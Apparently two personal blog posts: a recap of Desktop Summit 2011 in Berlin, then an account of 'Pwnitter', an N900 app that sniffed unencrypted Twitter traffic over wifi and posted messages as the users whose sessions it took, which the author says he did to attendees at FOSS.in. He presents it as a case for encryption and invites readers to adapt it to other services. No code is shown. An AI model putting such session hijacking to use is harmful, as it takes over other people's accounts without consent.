Desktop Summit 2011 in Berlin

This years GUADEC^W DesktopSummit took place in Berlin. Sure thing that I attended 🙂 Due to loads of stuff happening meanwhile, I didn’t come around to actually write about it. But I still want to mention a few things.

It was, like always, pretty nice to see all the faces again and catch up. The venue was almost excellent and provided good lecture halls and infrastructure, although the wireless was a bit flaky and spots to sit down and get together were sparse. Anyway, I have never seen so many actual users or wannabe users. Being in the heart of Germany’s capital definitely helped to make ourselves visible. Funnily enough, I met some folks who I chatted up during LinuxTag while I was presenting GNOME. I invited them to come to the DesktopSummit and so they did \o/

There were many talks and I didn’t see most of them. In fact, I was volunteering and meeting people so I couldn’t attend many lectures. But there was nothing I regret not having seen. The ones I did see were interesting enough, but not ground breaking. There’s a good summary over here.

We tried to record the talks but for some technical reasons it didn’t work out of the box. The network was too slow and no disks were available. We convinced the guy in charge to make us buy disks which eventually got used but I actually don’t know whether the lectures will be released at all.

A nice surprise was Intel giving away ExoPCs. In return they required you to sit and listen to presentations about their Appstore thingy called “AppUp“. Apparently a technology that tries to resemble OBS (because of distributing software via the web) and .debfiles+Synaptic (because of distributing software with a native GUI) with an additional payment layer in between. But it fails big time to do so. Not only can it not build binaries out of the sources that you give it, but it also can’t track dependencies. Welcome to 2011. Needless to say that it’s heavily targeted for Windows. Double fail that you can’t build Windows software for their store thing without having a Windows platform (and development tools) yourself.

The PC itself is neat. It’s a full tablet with only one soft key. The MeeGo version that came with it was out of date and updating was a major pain in the afternoon. It involved getting a USB keyboard because the OnScreenKeyboard would of course not show up if you open a terminal. And you needed a keyboard, because you can of course not update the software with that MeeGo version. There is no software management application at all. And most certainly, Intel’s new AppUp thing is not included in the latest and greatest release. In fact, it’s not even easily installable as it involves googling for the RPM file to be manually installed. By now I talked to Intel engineers and it seems that an actual vendor is supposed to integrate their version of the AppUp thing in the rest of the OS. So Intel doesn’t see itself in the position to do this. Other weird glitches include the hardware: While the ExoPC has a rotation sensor, it would be way to boring if it worked; so it doesn’t. And the hardware turns itself off after a while. Just like that. It feels like we have at least 3 years of engineering left before we can start dreaming of being able to ship a tablet platform that is ready for a day to day use. I have to note that the content centric UI approach is definitely very handy. Let’s hope it improves by fixing all those tiny things around the actual UI.

The discussion about a joint conference was bubbling up again. Of course. The main argument against a joint conference seems to be that it is considered to slow GNOME’s development down if we meet together, because we have to give time to the other people and cannot do our own program meanwhile. There are probably many variations of that argument, including that we do not collaborate anyway, so let’s rather not invest time in a joint conference.

While I do agree that the current form of the conference is not necessarily optimal, I don’t think that we should stop meeting up together. At the end of day, multiple (desktop) implementations or technologies are just pointless duplications. So let’s rather try to unify and be a unity (haha, pun intended) instead of splitting up further. I am very well aware of the fact that it’s technically unrealistic right now. But that’s the future we endeavour and we should work on making it possible, not work against it. So we don’t necessarily need to have a fully joint conference. After all, our technologies do differ quite substantially, depending on how you look at it. But let’s give each other the opportunity to learn about other technologies and speak to the key people. We might not fully make use of these opportunities yet, but if we design the conferences in a way that the camps have enough time to handle their internal issues and before or afterwards do a joint thing, then no harm is done if opportunities weren’t taken.

Another hot topic were Copyright Assignments. There was a panel made up of interesting people including Mark Shuttleworth. The discussion was alright, but way too short. They barely had 45 minutes which made it less than 15 minutes each. Barely enough to get a point across. And well, I didn’t really understand the arguments *for* giving away any of your rights. It got really weird as Mark tried to make another point: It would be generous if a contributor donated the code to the company and the participants should take into account that generosity would be a strong factor contributors would strive for. I haven’t seen that point being discussed anywhere yet, so let me start by saying that it is quite absurd. What could be more generous than giving your code to the public and ensuring that it stays freely available?! Just to be very clear: The GPL enables you to effectively do exactly that: Release code and ensure that it remains free.

I was delighted to see that the next GUADEC will take place in A Corunha. I’d rather have gone to Prague though. But maybe the Czech team can be motivated to apply again the next time.

Pwnitter

Uh, I totally forgot to blog about a funny thing that happened almost a year ago which I just mentioned slightly *blush*. So you probably know this Internet thing and if you’re one of the chosen and carefully gifted ones, you confused it with the Web. And if you’re very special you do this Twitter thing and expose yourself and your communications pattern to some dodgy American company. By now, all of the following stuff isn’t of much interest anymore, so you might as well quit reading.

It all happenend while being at FOSS.in. There was a contest run by Nokia which asked us to write some cool application for the N900. So I did. I packaged loads of programs and libraries to be able to put the wireless card into monitor mode. Then I wiretapped (haha) the wireless and sniffed for Twitter traffic. Once there was a Twitter session going on, I sniffed the necessary authentication information was extracted and a message was posted on the poor user’s behalf. I coined that Pwnitter, because it would pwn you via Twitter.

That said, we had great fun at FOSS.in, where nearly everybodies Twitter sessions got hijacked 😉 Eventually, people stopped using plain HTTP and moved to end to end encrypted sessions via TLS.

Anyway, my program didn’t win anything because as it turned out, Nokia wanted to promote QML and hence we were supposed to write something that makes use of that. My program barely has a UI… It is made up of one giant button…

Despite not getting lucky with Nokia, the community apparently received the thing very well.

So there is an obvious big elephant standing in the room asking why would you want to “hack” Twitter. I’d say it’s rather easy to answer. The main point being that you should use end to end encryption when doing communication. And the punchline comes now: Don’t use a service that doesn’t offer you that by default. Technically, it wouldn’t be much of a problem to give you an encrypted link to send your messages. However, companies tend to be cheap and let you suffer with a plain text connection which can be easily tapped or worse: manipulated. Think about it. If the company is too frugal to protect your communication from pimpled 13yr olds with a wifi card, why would you want to use their services?

By now Twitter (actually since March 2011, making it more than 6 month ago AFAIK) have SSL enabled by default as far as I can tell. So let’s not slash Twitter for not offering an encrypted link for more than 5 years (since they were founded back in 2006). But there are loads of other services that suffer from the very same basic problem. Including Facebook. And it would be easy to adapt the existing solution stuff like Facebook, flickr, whatnot.

A noteable exception is Google though. As far as I can see, they offer encryption by default except for the search. If there is an unencrypted link, I invite you to grab the sources of Pwnitter and build your hack.

If you do so, let me give you an advise as I was going nuts over a weird problem with my Pwnitter application for Maemo. It’s written in Python and when building the package with setuptools the hashbang would automatically be changed to “#!/scratchbox/tools/bin/python“, instead of, say, “/usr/bin/python“.

I tried tons of things for many hours until I realised, that scratchbox redirects some binary paths.

However, that did not help me to fix the issue. As it turned out, my problem was that I didn’t depend on a python-runtime during build time. Hence the build server picked scratchbox’s python which was located in /scratchbox/bin.

Creative Commons Attribution-ShareAlike 3.0 Unported
This work by Muelli is licensed under a Creative Commons Attribution-ShareAlike 3.0 Unported.